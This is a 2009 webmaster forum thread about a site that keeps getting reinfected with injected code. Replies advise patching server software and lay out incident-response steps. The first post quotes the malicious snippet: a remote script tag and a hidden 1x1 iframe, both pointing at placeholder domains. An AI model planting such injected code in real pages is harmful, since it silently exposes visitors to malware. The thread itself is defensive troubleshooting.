Welcome to WebmasterWorld Guest from

Forum Moderators: incrediBILL

Message Too Old, No Replies

Infected site - need help!

by iframe



9:06 am on Apr 22, 2009 (gmt 0)

5+ Year Member

Hi, I got a big problem with my site which was infected couple of times. My site was infected with milicious code

<!-- ad --><script language=javascript src="http://example.com/show.js"></script><!-- /ad -->
<iframe src="http://example.net/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>

I scanned my computer (with Kaspersky) i got no problems with viruses, I changed my ftp password and no results. Even though I deleted this code, after few days problem re-appears, does anybody got similar issue? Maybe you guys know the solution for this. I read also article about it, but still no solution.


[edited by: tedster at 8:22 pm (utc) on April 22, 2009]
[edit reason] switch to example.com [/edit]


8:36 pm on Apr 22, 2009 (gmt 0)

WebmasterWorld Senior Member tedster is a WebmasterWorld Top Contributor of All Time 10+ Year Member

Hello Schism, and welcome to the forums.

The steps you took would stop the problem if it originates on your local computer. I think it's more likely that the malicious code is being injected directly on your server. It's very important these days to keep all your server applications updated with the most recent patches and software versions.

I know that tech support at many web hosts would like to blame these hacks on poor password security - but in my experience, that's not the core problem. The core problem is using unpatched versions of server applications. Once a common program has been in use for a while, the "dark forces" WILL find security loopholes they can use to hack in.


6:37 am on Apr 23, 2009 (gmt 0)

5+ Year Member

Thanks for reply (and editing ;) Tedster.
I scanned my PC to avoid uploading infected files on the server.
The problem is also that, the issue appears on the page which is not application/cms/cmr etc. It's just simple html + few elements in php and a little bit javascript, but nothing fancy ;).
I also think that the milicious code is injected directly on the server. But still no solution :\


7:13 am on Apr 23, 2009 (gmt 0)

5+ Year Member

Similar malicious code has been added to my home
page recently, this has happened a few times
and the code varies each time it has been added.

Have changed my password and will wait to see
what happens in the future.




7:27 am on Apr 23, 2009 (gmt 0)

5+ Year Member

Hi there- what's the best way of picking up malicious code like that? Is Kaspersky enough or should I be doing more? tnx!


12:11 pm on Apr 23, 2009 (gmt 0)

5+ Year Member


I've changed passwords too, but that didn't help.


6:55 pm on Apr 23, 2009 (gmt 0)

WebmasterWorld Senior Member tedster is a WebmasterWorld Top Contributor of All Time 10+ Year Member

There's a lot of detail about dealing with different kinds of server hacks in our Google Search forum:

How Hacked Servers Can Hurt Your Traffic [webmasterworld.com]


11:52 pm on Apr 23, 2009 (gmt 0)

WebmasterWorld Senior Member swa66 is a WebmasterWorld Top Contributor of All Time 10+ Year Member

Changing your password is unlikely to help if your server is somehow vulnerable.

Security staff usually has a six step response in place for dealing with security incidents:

1. Prepare

To late now for some of you, but there is a load to do to both avoid the problems and to prepare what you do when you have an incident.

2. Identification and Detection

Chain of custody starts here. Assigning leadership to the response is also doen here as is coordination.

[3]3. Containment[/b]

Make sure it doesn't get worse.

Thing is once an hacker can change files on a web server, the game is almost over. Either they got access to a database (e.g. via SQL injection (something you should learn about and prevent in step 1), and now the entire database can't be trusted any longer. What if they also changed something else unnoticed (even accidentally?)

or either they found another way in and you need to identify (step 2) the way they used to get in from your logs.

Decisions need to be taken here: continue vs. abort ? There's risk and benefits in both, so the risks should be evaluated.

Backup of the hacked system ?
- preserve what you still have
- preserve evidence
- ...
DO NOT overwrite older backups doing this.
(step 1: prepare for making this backup ...)

4. Eradication

Find and remove the vulnerability. Improve defenses.
Find all that went on after the initial attack, and learn from that.

5. Recovery

Yes, almost the last step: recover: reinstall systems as needed (it'd most often easy to start again than to trust something that was hacked and where you might not have found all backdoors, rootkits etc.). It removes a lingering doubt you'll always have if you don't do this.

Rebuild data to a known safe state.

Be extremely careful with any data from the backup in Step 3, but also with older backups as they too can contain problems already (don;t reintroduce the vulnerability etc.

Validation and putting back in business is part of this of course.

6. Lessons learned
Probably the most important one as you use it to feed the entire process and improve every step to do better next time. To train developers so they can code with less problems, to improve the preparedness to incidents, to improve communication, ...

Import here is that you can also learn from incidents that others have.

These steps aren't always fully sequential, but don't try to get back in business before you know what happened as it'll backfire badly in my experience.

Now I realize most of you don't manage your own servers, so your situation is more complex as you'll need to coordinate this with the provider of that service. It's entirely possible the host got whacked not due to something you did, but your neighbor or the machine itself might have introduced something that got exploited. Few hosts are going to be very open in their communication about this, but you need to involv them anyway as much as possible.


7:16 am on Apr 24, 2009 (gmt 0)

WebmasterWorld Senior Member dreamcatcher is a WebmasterWorld Top Contributor of All Time 10+ Year Member

Are you on a shared server? The issue might be being caused by someone else`s website.



9:04 pm on Apr 24, 2009 (gmt 0)

5+ Year Member


No, It's not shared server. I wonder if it's not because of javascript somehow... Thanks all for replies! I already did backup and improved security issues on my website. Now I'm waiting what will happen. I will also reply any results here :)

edit: I also wonder if Is possible (in your opinion guys) that the injection of milicious code could happened because of Google Analytics, since I've installed It the problem somehow appeared. I just don't know if I can connect somehow these two facts.

[edited by: Schism at 9:09 pm (utc) on April 24, 2009]


Featured Threads

Hot Threads This Week

Hot Threads This Month